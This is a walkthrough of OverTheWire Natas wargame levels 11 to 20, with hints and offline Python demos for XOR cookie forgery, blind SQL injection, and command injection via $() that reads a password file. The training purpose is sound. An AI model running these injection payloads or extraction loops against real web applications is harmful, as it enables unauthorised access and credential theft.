
A brief writeup of solving the OverTheWire wargame Natas, levels 11 through 20

10 ➜ 11

  • Well, some characters are blocked this time (input containing them is rejected outright), but that's not enough to stop us
  • Try this: '' /etc/natas_webpass/natas11 # (the empty pattern matches every line of the password file, and the # comments out the dictionary that would otherwise be searched too)

11 ➜ 12

  • The source code will tell you what algorithm is being used
  • That algorithm is susceptible to a known-plaintext attack: you can see exactly what the default data is and what cookie it turns into
  • Because XOR is its own inverse, the attack works like this
plaintext ⊕ key = encrypted_text
encrypted_text ⊕ plaintext = key
encrypted_text ⊕ key = plaintext
  • Find the key using the default data and the default cookie: XOR the decoded cookie with the encoded default data and the repeating key falls out
  • Now modify the data as you need, encrypt it with the recovered key and send it back as the cookie
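As an added example (not code from the original writeup), here is the known-plaintext key recovery and cookie forging in Python. The default data and the json/XOR/base64 pipeline follow the level's PHP source; the key is a constructed stand-in for the censored one, and the script produces the "default cookie" itself so it runs offline. Against the real level you would paste the cookie your browser received in place of that.

```python
import base64
import json
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key (the level's xor_encrypt, on bytes)."""
    return bytes(a ^ b for a, b in zip(data, cycle(key)))


def php_json(data: dict) -> bytes:
    """Match PHP json_encode() output for a flat string array: no whitespace."""
    return json.dumps(data, separators=(",", ":")).encode()


def make_cookie(key: bytes, data: dict) -> str:
    """What the server does in saveData(): base64(xor(json(data), key))."""
    return base64.b64encode(xor_bytes(php_json(data), key)).decode()


def decrypt_cookie(key: bytes, cookie: str) -> dict:
    """What the server does in loadData(): json_decode(xor(base64_decode(cookie)))."""
    return json.loads(xor_bytes(base64.b64decode(cookie), key))


def recover_key(known_plaintext: bytes, cookie: str) -> bytes:
    """encrypted ^ plaintext = repeated key; its shortest period is the key.

    Works as long as the key is no longer than the known plaintext.
    """
    stream = xor_bytes(base64.b64decode(cookie), known_plaintext)
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - n] for i in range(n, len(stream))):
            return stream[:n]
    return stream  # not reached: n == len(stream) always satisfies the check


# The level's default data (from its source). DEMO_KEY is a constructed
# stand-in for the real, censored key; it only exists so the demo runs offline.
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}
DEMO_KEY = b"s3kr"


def attack(default_cookie: str):
    """Recover the key from the default cookie, then forge one with showpassword=yes."""
    key = recover_key(php_json(DEFAULT_DATA), default_cookie)
    forged = make_cookie(key, {"showpassword": "yes", "bgcolor": "#ffffff"})
    return key, forged


if __name__ == "__main__":
    default_cookie = make_cookie(DEMO_KEY, DEFAULT_DATA)  # what the server hands out
    key, forged = attack(default_cookie)
    print("recovered key:", key)
    print("forged cookie:", forged)
    print("server decodes:", decrypt_cookie(DEMO_KEY, forged))
```

The period search is what turns a 41-byte key stream into the short repeating key; without it you would only be able to re-encrypt messages no longer than the default JSON.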

12 ➜ 13

  • Notice which part of the upload the code never checks
  • Manipulate the HTML form to use that part to your advantage and upload a file that simply prints out the password
  • A PHP file will work

13 ➜ 14

  • Read about the function being used to validate the uploaded data; it only looks at the first few bytes of the file
  • A list of file types and their initial bytes is available here
  • PHP to the rescue again...

14 ➜ 15

  • Straightforward ______ injection

15 ➜ 16

  • Straightforward ______ ______ injection
  • Remember, passwords consist of 32 alphanumeric characters, so the search space per position is small
  • Fuzzy matching strings to specific patterns can require some specific words...
  • Very good write-up about blind SQL injection

16 ➜ 17

  • Fuzzy matching again, but this time with grep
  • $() to run commands is still allowed, so let's take advantage of that
  • Find a word that exists in the dictionary file, say xyz. It has to be a word that literally appears in the file.
  • Now the trick is to grep the password file for a prefix of the password inside $(), prepend the result to the known word and give the whole thing as the input.
  • If the inner grep matches, the searched string becomes <password>xyz, something that doesn't exist in the dictionary being queried, so the output is empty; if it doesn't match, only xyz is searched and the word is printed. Empty output therefore means your guessed prefix was right.
  • This one was a bit tricky, so feel free to spend a lot of time on it.
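The two blind-extraction levels above (15 and 16) use the same prefix-by-prefix loop with different oracles. Here is an added example, not from the original writeup, that runs that loop against two offline stand-ins for the vulnerable code: an SQLite-backed copy of the natas15 query (single quotes and PRAGMA case_sensitive_like standing in for MySQL's double-quoted strings and LIKE BINARY) and a grep command run through sh the way natas16 does with passthru(). The secrets, the dictionary contents and the filter regex (approximating the level's blocklist) are constructed for the demo; against the real levels the oracle would send an HTTP request and inspect the response body instead.

```python
import os
import re
import sqlite3
import string
import subprocess
import tempfile

ALPHABET = string.ascii_letters + string.digits  # Natas passwords: 32 alphanumerics

# Constructed secrets for the offline demo (not real Natas passwords).
SQL_SECRET = "Ab3dE9fG"
FILE_SECRET = "zQ7pL2mN"


def extract_secret(oracle, alphabet=ALPHABET, max_len=32):
    """Generic prefix-extension loop shared by both levels.

    oracle(prefix) must return True when the secret starts with `prefix`.
    Each round tries every character; the first hit extends the prefix.
    When no character extends it, the secret is complete.
    """
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            if oracle(found + ch):
                found += ch
                break
        else:
            break
    return found


# Oracle 1: natas15-style boolean blind SQL injection, backed by SQLite.
def make_sqli_oracle():
    db = sqlite3.connect(":memory:")
    # stand-in for MySQL's LIKE BINARY: without it the prefix test ignores case
    db.execute("PRAGMA case_sensitive_like = ON")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('natas16', ?)", (SQL_SECRET,))

    def user_exists(username):
        # vulnerable, like the level: the username is concatenated into the query
        query = f"SELECT * FROM users WHERE username='{username}'"
        return len(db.execute(query).fetchall()) > 0

    def oracle(prefix):
        # "This user exists" only when the injected LIKE clause is true
        return user_exists(f"natas16' AND password LIKE '{prefix}%' -- ")

    return oracle


# Oracle 2: natas16-style command injection through $(...) in grep's pattern.
def make_grep_oracle():
    workdir = tempfile.mkdtemp()
    dictionary = os.path.join(workdir, "dictionary.txt")
    secret_file = os.path.join(workdir, "secret.txt")  # plays /etc/natas_webpass/natas17
    with open(dictionary, "w") as f:
        f.write("apple\nbanana\nhacker\n")
    with open(secret_file, "w") as f:
        f.write(FILE_SECRET + "\n")

    def search(key):
        # approximates the level's filter: ; | & ` ' " are blocked, $( ) is not
        if re.search(r'[;|&`\'"]', key):
            return ""
        # mimics passthru('grep -i "' . $key . '" dictionary.txt')
        cmd = f'grep -i "{key}" {dictionary}'
        return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout

    def oracle(prefix):
        # If the secret starts with prefix, $(...) expands to the secret and the
        # searched string becomes "<secret>hacker", absent from the dictionary: empty output.
        # Otherwise it expands to nothing and "hacker" is found: non-empty output.
        key = f"$(grep ^{prefix} {secret_file})hacker"
        return search(key) == ""

    return oracle


if __name__ == "__main__":
    print("natas15-style:", extract_secret(make_sqli_oracle()))
    print("natas16-style:", extract_secret(make_grep_oracle()))
```

The same extract_secret loop serves the time-based level that follows: only the oracle changes, to one that returns True when the response took measurably longer than the baseline.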

17 ➜ 18

  • You can see the query if debug=true, but that won't be of much use.
  • The query result is never shown: the code only learns whether the query ran, and every echo is commented out, so the boolean approach from the previous level has nothing to observe.
  • After a couple of trials, triggering time delays (SLEEP() in the injected condition) was the answer.
  • Be careful how you detect the delay: check whether the request completes within your window rather than comparing raw elapsed times, which network jitter blurs.

18 ➜ 19

  • Two words: brute force...

19 ➜ 20

  • Well, it isn't incremental now...
  • A lot of trial and error with CyberChef; it turns out the session ID is a hex-encoded ASCII string
  • Brute force again...